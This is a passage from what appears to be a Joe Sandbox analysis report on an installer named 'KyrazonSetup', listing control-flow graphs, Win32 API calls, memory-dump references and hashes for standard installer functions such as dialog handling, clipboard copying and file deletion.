40550b-405526 SendMessageA 173->177 178 405361-405367 call 404074 174->178 175->178 176->162 177->177 179 405528-405548 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 177->179 178->172 181 40554a-40556a SendMessageA 179->181 181->181 182 40556c-405580 GlobalUnlock SetClipboardData CloseClipboard 181->182 182->162
                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,00000403), ref: 00405264
                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00405273
                                                                                      • GetClientRect.USER32(?,?), ref: 004052B0
                                                                                      • GetSystemMetrics.USER32(00000002), ref: 004052B7
                                                                                      • SendMessageA.USER32(?,0000101B,00000000,?), ref: 004052D8
                                                                                      • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004052E9
                                                                                      • SendMessageA.USER32(?,00001001,00000000,?), ref: 004052FC
                                                                                      • SendMessageA.USER32(?,00001026,00000000,?), ref: 0040530A
                                                                                      • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040531D
                                                                                      • ShowWindow.USER32(00000000,?,0000001B,?), ref: 0040533F
                                                                                      • ShowWindow.USER32(?,00000008), ref: 00405353
                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 00405374
                                                                                      • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405384
                                                                                      • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040539D
                                                                                      • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004053A9
                                                                                      • GetDlgItem.USER32(?,000003F8), ref: 00405282
                                                                                        • Part of subcall function 00404074: SendMessageA.USER32(00000028,?,00000001,00403EA4), ref: 00404082
                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004053C5
                                                                                      • CreateThread.KERNELBASE(00000000,00000000,Function_00005199,00000000), ref: 004053D3
                                                                                      • FindCloseChangeNotification.KERNELBASE(00000000), ref: 004053DA
                                                                                      • ShowWindow.USER32(00000000), ref: 004053FD
                                                                                      • ShowWindow.USER32(?,00000008), ref: 00405404
                                                                                      • ShowWindow.USER32(00000008), ref: 0040544A
                                                                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040547E
                                                                                      • CreatePopupMenu.USER32 ref: 0040548F
                                                                                      • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004054A4
                                                                                      • GetWindowRect.USER32(?,000000FF), ref: 004054C4
                                                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004054DD
                                                                                      • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405519
                                                                                      • OpenClipboard.USER32(00000000), ref: 00405529
                                                                                      • EmptyClipboard.USER32 ref: 0040552F
                                                                                      • GlobalAlloc.KERNEL32(00000042,?), ref: 00405538
                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00405542
                                                                                      • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405556
                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0040556F
                                                                                      • SetClipboardData.USER32(00000001,00000000), ref: 0040557A
                                                                                      • CloseClipboard.USER32 ref: 00405580
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1919657953.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919695188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1920055468.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                                                                      • String ID:
                                                                                      • API String ID: 4154960007-0
                                                                                      • Opcode ID: dc9db1bb3042da1a1ed873bad6f0944ebfaf90529de2f46f5703e5cd34e1212a
                                                                                      • Instruction ID: cb443ab1f87c712d4fb343c0872367a3fcca99d855a89080dff2c14af257ba1e
                                                                                      • Opcode Fuzzy Hash: dc9db1bb3042da1a1ed873bad6f0944ebfaf90529de2f46f5703e5cd34e1212a
                                                                                      • Instruction Fuzzy Hash: 21A17B71900608BFEB119FA1DE89EAE7B79FB08345F00403AFA41B61A1C7758E51DF68
                                                                                      Function 00405768 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 159filestringCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 554 405768-40578e call 405a26 557 405790-4057a2 DeleteFileA 554->557 558 4057a7-4057ae 554->558 559 405931-405935 557->559 560 4057b0-4057b2 558->560 561 4057c1-4057d1 call 405fa0 558->561 562 4057b8-4057bb 560->562 563 4058df-4058e4 560->563 569 4057e0-4057e1 call 40597f 561->569 570 4057d3-4057de lstrcatA 561->570 562->561 562->563 563->559 566 4058e6-4058e9 563->566 567 4058f3-4058fb call 4062a3 566->567 568 4058eb-4058f1 566->568 567->559 577 4058fd-405911 call 405938 call 405720 567->577 568->559 572 4057e6-4057e9 569->572 570->572 575 4057f4-4057fa lstrcatA 572->575 576 4057eb-4057f2 572->576 578 4057ff-40581d lstrlenA FindFirstFileA 575->578 576->575 576->578 593 405913-405916 577->593 594 405929-40592c call 4050c7 577->594 580 405823-40583a call 405963 578->580 581 4058d5-4058d9 578->581 587 405845-405848 580->587 588 40583c-405840 580->588 581->563 583 4058db 581->583 583->563 591 40584a-40584f 587->591 592 40585b-405869 call 405fa0 587->592 588->587 590 405842 588->590 590->587 596 405851-405853 591->596 597 4058b4-4058c6 FindNextFileA 591->597 604 405880-40588b call 405720 592->604 605 40586b-405873 592->605 593->568 599 405918-405927 call 4050c7 call 405d7f 593->599 594->559 596->592 600 405855-405859 596->600 597->580 602 4058cc-4058cf FindClose 597->602 599->559 600->592 600->597 602->581 613 4058ac-4058af call 4050c7 604->613 614 40588d-405890 604->614 605->597 607 405875-405879 call 405768 605->607 615 40587e 607->615 613->597 616 405892-4058a2 call 4050c7 call 405d7f 614->616 617 4058a4-4058aa 614->617 615->597 616->597 617->597
                                                                                      APIs
                                                                                      • DeleteFileA.KERNELBASE(?,?,74DF3410,00485000,00000000), ref: 00405791
                                                                                      • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\*.*,\*.*,C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\*.*,?,?,74DF3410,00485000,00000000), ref: 004057D9
                                                                                      • lstrcatA.KERNEL32(?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\*.*,?,?,74DF3410,00485000,00000000), ref: 004057FA
                                                                                      • lstrlenA.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\*.*,?,?,74DF3410,00485000,00000000), ref: 00405800
                                                                                      • FindFirstFileA.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\*.*,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\*.*,?,?,74DF3410,00485000,00000000), ref: 00405811
                                                                                      • FindNextFileA.KERNELBASE(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004058BE
                                                                                      • FindClose.KERNEL32(00000000), ref: 004058CF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1919657953.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919695188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1920055468.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\*.*$\*.*
                                                                                      • API String ID: 2035342205-2901176145
                                                                                      • Opcode ID: c0b77bb7ec77e54292dcea2d95d3dd54b397864b60da3618d9e1bcabfe4094fc
                                                                                      • Instruction ID: 4034ce2da7d910ed1c3e993348aad1dec665958d5cdc48b45f2fa778073bb28c
                                                                                      • Opcode Fuzzy Hash: c0b77bb7ec77e54292dcea2d95d3dd54b397864b60da3618d9e1bcabfe4094fc
                                                                                      • Instruction Fuzzy Hash: 2C51B331800A05FAEF216B618C85BAF7A78DF42314F14817FF841B61E2D73C4952EE6A
                                                                                      Function 004062A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FindFirstFileA.KERNELBASE(74DF3410,004480C0,C:\,00405A69,C:\,C:\,00000000,C:\,C:\,74DF3410,?,00485000,00405788,?,74DF3410,00485000), ref: 004062AE
                                                                                      • FindClose.KERNELBASE(00000000), ref: 004062BA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1919657953.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919695188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1920055468.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$CloseFileFirst
                                                                                      • String ID: C:\
                                                                                      • API String ID: 2295610775-3404278061
                                                                                      • Opcode ID: ebfe8471de6f7f538a7bce34d1e55e3908f962607e92f8bf4160da5918238004
                                                                                      • Instruction ID: 41fb9a97abe6314a88c4d6bfa977ce05a31a72e52743b0bc12efeb1f41a56e63
                                                                                      • Opcode Fuzzy Hash: ebfe8471de6f7f538a7bce34d1e55e3908f962607e92f8bf4160da5918238004
                                                                                      • Instruction Fuzzy Hash: E9D012355290206BC21037386E0C84B7A589F153307128A7BF4A6F21E0CB348C66869C
                                                                                      Function 00403B6B Relevance: 48.3, APIs: 32, Instructions: 346windowstringCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 183 403b6b-403b7d 184 403b83-403b89 183->184 185 403cbe-403ccd 183->185 184->185 186 403b8f-403b98 184->186 187 403d1c-403d31 185->187 188 403ccf-403d0a GetDlgItem * 2 call 40403f KiUserCallbackDispatcher call 40140b 185->188 189 403b9a-403ba7 SetWindowPos 186->189 190 403bad-403bb0 186->190 192 403d71-403d76 call 40408b 187->192 193 403d33-403d36 187->193 211 403d0f-403d17 188->211 189->190 195 403bb2-403bc4 ShowWindow 190->195 196 403bca-403bd0 190->196 202 403d7b-403d96 192->202 198 403d38-403d43 call 401389 193->198 199 403d69-403d6b 193->199 195->196 203 403bd2-403be7 DestroyWindow 196->203 204 403bec-403bef 196->204 198->199 214 403d45-403d64 SendMessageA 198->214 199->192 201 40400c 199->201 209 40400e-404015 201->209 207 403d98-403d9a call 40140b 202->207 208 403d9f-403da5 202->208 210 403fe9-403fef 203->210 212 403bf1-403bfd SetWindowLongA 204->212 213 403c02-403c08 204->213 207->208 217 403fca-403fe3 DestroyWindow EndDialog 208->217 218 403dab-403db6 208->218 210->201 216 403ff1-403ff7 210->216 211->187 212->209 219 403cab-403cb9 call 4040a6 213->219 220 403c0e-403c1f GetDlgItem 213->220 214->209 216->201 224 403ff9-404002 ShowWindow 216->224 217->210 218->217 225 403dbc-403e09 call 405fc2 call 40403f * 3 GetDlgItem 218->225 219->209 221 403c21-403c38 SendMessageA IsWindowEnabled 220->221 222 403c3e-403c41 220->222 221->201 221->222 226 403c43-403c44 222->226 227 403c46-403c49 222->227 224->201 253 403e13-403e4f ShowWindow KiUserCallbackDispatcher call 404061 EnableWindow 225->253 254 403e0b-403e10 225->254 230 403c74-403c79 call 404018 226->230 231 403c57-403c5c 227->231 232 403c4b-403c51 227->232 230->219 234 403c92-403ca5 SendMessageA 231->234 236 403c5e-403c64 231->236 232->234 235 403c53-403c55 232->235 234->219 235->230 239 403c66-403c6c call 40140b 236->239 240 403c7b-403c84 call 40140b 236->240 251 403c72 239->251 240->219 249 403c86-403c90 240->249 249->251 251->230 257 403e51-403e52 253->257 258 403e54 253->258 254->253 259 403e56-403e84 GetSystemMenu EnableMenuItem SendMessageA 257->259 258->259 260 403e86-403e97 SendMessageA 259->260 261 403e99 259->261 262 403e9f-403ed9 call 404074 call 403b4c call 405fa0 lstrlenA call 405fc2 SetWindowTextA call 401389 260->262 261->262 262->202 273 403edf-403ee1 262->273 273->202 274 403ee7-403eeb 273->274 275 403f0a-403f1e DestroyWindow 274->275 276 403eed-403ef3 274->276 275->210 278 403f24-403f51 CreateDialogParamA 275->278 276->201 277 403ef9-403eff 276->277 277->202 279 403f05 277->279 278->210 280 403f57-403fae call 40403f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 278->280 279->201 280->201 285 403fb0-403fc3 ShowWindow call 40408b 280->285 287 403fc8 285->287 287->210
                                                                                      APIs
                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403BA7
                                                                                      • ShowWindow.USER32(?), ref: 00403BC4
                                                                                      • DestroyWindow.USER32 ref: 00403BD8
                                                                                      • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403BF4
                                                                                      • GetDlgItem.USER32(?,?), ref: 00403C15
                                                                                      • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403C29
                                                                                      • IsWindowEnabled.USER32(00000000), ref: 00403C30
                                                                                      • GetDlgItem.USER32(?,00000001), ref: 00403CDE
                                                                                      • GetDlgItem.USER32(?,00000002), ref: 00403CE8
                                                                                      • KiUserCallbackDispatcher.NTDLL(?,000000F2,?), ref: 00403D02
                                                                                      • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403D53
                                                                                      • GetDlgItem.USER32(?,00000003), ref: 00403DF9
                                                                                      • ShowWindow.USER32(00000000,?), ref: 00403E1A
                                                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403E2C
                                                                                      • EnableWindow.USER32(?,?), ref: 00403E47
                                                                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403E5D
                                                                                      • EnableMenuItem.USER32(00000000), ref: 00403E64
                                                                                      • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403E7C
                                                                                      • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403E8F
                                                                                      • lstrlenA.KERNEL32(0043C070,?,0043C070,00000000), ref: 00403EB9
                                                                                      • SetWindowTextA.USER32(?,0043C070), ref: 00403EC8
                                                                                      • ShowWindow.USER32(?,0000000A), ref: 00403FFC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1919657953.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919695188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1920055468.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Item$MessageSend$Show$CallbackDispatcherEnableMenuUser$DestroyEnabledLongSystemTextlstrlen
                                                                                      • String ID:
                                                                                      • API String ID: 3906175533-0
                                                                                      • Opcode ID: bb254eebcc43e1efea9e3628f986721872f6c569cd1eeb9010ff054dc953221e
                                                                                      • Instruction ID: 666c89c176ee591166c77646ceded32e7735a2126acae7f0578b7925c4b2ff01
                                                                                      • Opcode Fuzzy Hash: bb254eebcc43e1efea9e3628f986721872f6c569cd1eeb9010ff054dc953221e
                                                                                      • Instruction Fuzzy Hash: 6CC1A071504705EBEB216F62EE85E2B3A7CFB4674AF00053EF641B21E1CB7998419B2D
                                                                                      Function 004037CE Relevance: 38.7, APIs: 13, Strings: 9, Instructions: 215stringregistryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 288 4037ce-4037e6 call 406338 291 4037e8-4037f8 call 405efe 288->291 292 4037fa-40382b call 405e87 288->292 301 40384e-403877 call 403a93 call 405a26 291->301 297 403843-403849 lstrcatA 292->297 298 40382d-40383e call 405e87 292->298 297->301 298->297 306 40387d-403882 301->306 307 4038fe-403906 call 405a26 301->307 306->307 308 403884-4038a8 call 405e87 306->308 313 403914-403939 LoadImageA 307->313 314 403908-40390f call 405fc2 307->314 308->307 315 4038aa-4038ac 308->315 317 4039ba-4039c2 call 40140b 313->317 318 40393b-40396b RegisterClassA 313->318 314->313 319 4038bd-4038c9 lstrlenA 315->319 320 4038ae-4038bb call 405963 315->320 331 4039c4-4039c7 317->331 332 4039cc-4039d7 call 403a93 317->332 321 403971-4039b5 SystemParametersInfoA CreateWindowExA 318->321 322 403a89 318->322 326 4038f1-4038f9 call 405938 call 405fa0 319->326 327 4038cb-4038d9 lstrcmpiA 319->327 320->319 321->317 325 403a8b-403a92 322->325 326->307 327->326 330 4038db-4038e5 GetFileAttributesA 327->330 334 4038e7-4038e9 330->334 335 4038eb-4038ec call 40597f 330->335 331->325 341 403a60-403a61 call 405199 332->341 342 4039dd-4039f7 ShowWindow call 4062ca 332->342 334->326 334->335 335->326 346 403a66-403a68 341->346 347 403a03-403a15 GetClassInfoA 342->347 348 4039f9-4039fe call 4062ca 342->348 349 403a82-403a84 call 40140b 346->349 350 403a6a-403a70 346->350 354 403a17-403a27 GetClassInfoA RegisterClassA 347->354 355 403a2d-403a50 DialogBoxParamA call 40140b 347->355 348->347 349->322 350->331 351 403a76-403a7d call 40140b 350->351 351->331 354->355 359 403a55-403a5e call 40371e 355->359 359->325
                                                                                      APIs
                                                                                        • Part of subcall function 00406338: GetModuleHandleA.KERNEL32(?,?,?,0040327F,0000000A), ref: 0040634A
                                                                                        • Part of subcall function 00406338: GetProcAddress.KERNEL32(00000000,?), ref: 00406365
                                                                                      • lstrcatA.KERNEL32(00483000,0043C070,80000001,Control Panel\Desktop\ResourceLocale,00000000,0043C070,00000000,00000002,74DF3410,00485000,0047B000,00000000), ref: 00403849
                                                                                      • lstrlenA.KERNEL32(Remove folder: ,?,?,?,Remove folder: ,00000000,0047D000,00483000,0043C070,80000001,Control Panel\Desktop\ResourceLocale,00000000,0043C070,00000000,00000002,74DF3410), ref: 004038BE
                                                                                      • lstrcmpiA.KERNEL32(?,.exe), ref: 004038D1
                                                                                      • GetFileAttributesA.KERNEL32(Remove folder: ), ref: 004038DC
                                                                                      • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,0047D000), ref: 00403925
                                                                                        • Part of subcall function 00405EFE: wsprintfA.USER32 ref: 00405F0B
                                                                                      • RegisterClassA.USER32(0044E3A0), ref: 00403962
                                                                                      • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0040397A
                                                                                      • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 004039AF
                                                                                      • ShowWindow.USER32(00000005,00000000), ref: 004039E5
                                                                                      • GetClassInfoA.USER32(00000000,RichEdit20A,0044E3A0), ref: 00403A11
                                                                                      • GetClassInfoA.USER32(00000000,RichEdit,0044E3A0), ref: 00403A1E
                                                                                      • RegisterClassA.USER32(0044E3A0), ref: 00403A27
                                                                                      • DialogBoxParamA.USER32(?,00000000,00403B6B,00000000), ref: 00403A46
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1919657953.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919695188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1920055468.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                      • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$Remove folder: $RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                      • API String ID: 1975747703-3456440045
                                                                                      • Opcode ID: e7b77775b255d99bd90b4d0e87e5f645bd8a311ac873016b5d786077c09591cd
                                                                                      • Instruction ID: fc6281f6d7ea5fdedce45eee0aa3b2185decc2f9b4bea6d8e743b00daf016ab2
                                                                                      • Opcode Fuzzy Hash: e7b77775b255d99bd90b4d0e87e5f645bd8a311ac873016b5d786077c09591cd
                                                                                      • Instruction Fuzzy Hash: D561D771240701BED611AF669D45F3B3AACEB4670AF00447FF885B22E2DB7C99018B2D
                                                                                      Function 00405FC2 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 199stringCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
